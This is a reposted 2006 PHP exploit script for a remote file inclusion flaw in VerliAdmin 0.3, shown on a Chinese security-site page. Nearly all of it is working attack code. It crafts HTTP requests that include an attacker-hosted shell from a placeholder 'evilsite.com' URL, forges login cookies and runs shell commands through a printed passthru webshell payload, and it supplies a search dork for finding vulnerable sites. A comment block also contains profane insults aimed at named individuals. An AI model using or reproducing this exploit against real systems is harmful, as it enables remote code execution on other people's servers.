首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VerliAdmin <= 0.3 (index.php) Remote File Include Exploit
来源:DEVIL TEAM 作者:Kacper 发布时间:2006-12-19  

<?


/*
P.S
Chcialem serdecznie niepozdrowic wszystkie kurwy takie jak Ne0 i jego dziwki!!
Mam was w dupie, a Ty Ne0 pryszczu jebany pogodz sie z porazka bo to ja zawsze bede lepszy od Ciebie!
Nie pozdrawiam tez wszystkie gnidy jakie chowaja sie na swoich smiesznych hubach DC, jestescie poprostu smieszni...
Cale to ZOO pozdrawiam srodkowym palcem
H.W.D.Cale Direct Connect PL
by Kacper & DEVIL TEAM
*/

//Kacper Settings
$exploit_name = "VerliAdmin <= 0.3 File Include Exploit";
$script_name = "VerliAdmin 0.3";
$script_site = "http://bohyn.czechweb.cz/";
$dork = 'allinurl:"verliadmin"';
//**************************************************************


print '
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###

- - [DEVIL TEAM THE BEST POLISH TEAM] - -

[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)


========> DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <========
========> http://www.rahim.webd.pl/ <========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)

Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0d'e, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

and

Dr Max Virus
TamTurk,
hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings for 4ll Fusi0n Group members ;-)
and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';

if ($argc<6) {
print ('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host shell nick pass cmd OPTIONS
host: script server (ip/hostname)
shell: path to shell
nick: You username in hub
pass: You username password
cmd: a shell command (ls -la)
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.evilsite.com/shell.txt Hauru zamek ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"Hacker_Kacper_Made_in_Poland!!..Hauru..^_^..the..best..polish..team..Greetz";ini_set("max_execution_time",0);echo "hauru";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpackets($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$shell=$argv[2];
$nick=$argv[3];
$password=$argv[4];
$cmd="";

$port=80;
$proxy="";
for ($i=5; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}

if ($proxy=='') {$p='http://'.$host.':'.$port;}

$num1 = Rand(97, 122);
$num2 = Rand(65, 90);
$pass = Crypt($password, Chr($num1).Chr($num2));

$packet ="GET ".$p."index.php?q=".$shell."?cmd=".$cmd."%00 HTTP/1.0\r\n";
$pakiet.="Cookie: brwsr_tp=Opera;\r\n";
$pakiet.="Cookie: lang=pl;\r\n";
$pakiet.="Cookie: login=1;\r\n";
$pakiet.="Cookie: nick=".$nick.";\r\n";
$pakiet.="Cookie: password=".$pass.";\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpackets($packet);
if (strstr($html,"hauru"))
{
$temp=explode("hauru",$html);
die($temp[1]);
}
echo "Exploit err0r :(\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n";
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Star FTP Server 1.10 (RETR) Re
·MS Office Outlook Recipient Co
·extreme-fusion <= 4.02 Remo
·wget <= 1.10.2 (Unchecked B
·GNU InetUtils ftpd 1.4.2 (ld.s
·Exploits Intel 2200BG 802.11 w
·Windows Media Player 9/10 (MID
·KDE 3.5 (libkhtml) <= 4.2.0
·Sambar FTP Server 6.4 (SIZE) R
·Oracle <= 9i / 10g File Sys
·OpenLDAP <= 2.4.3 (KBIND) R
·Hewlett-Packard FTP Print Serv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved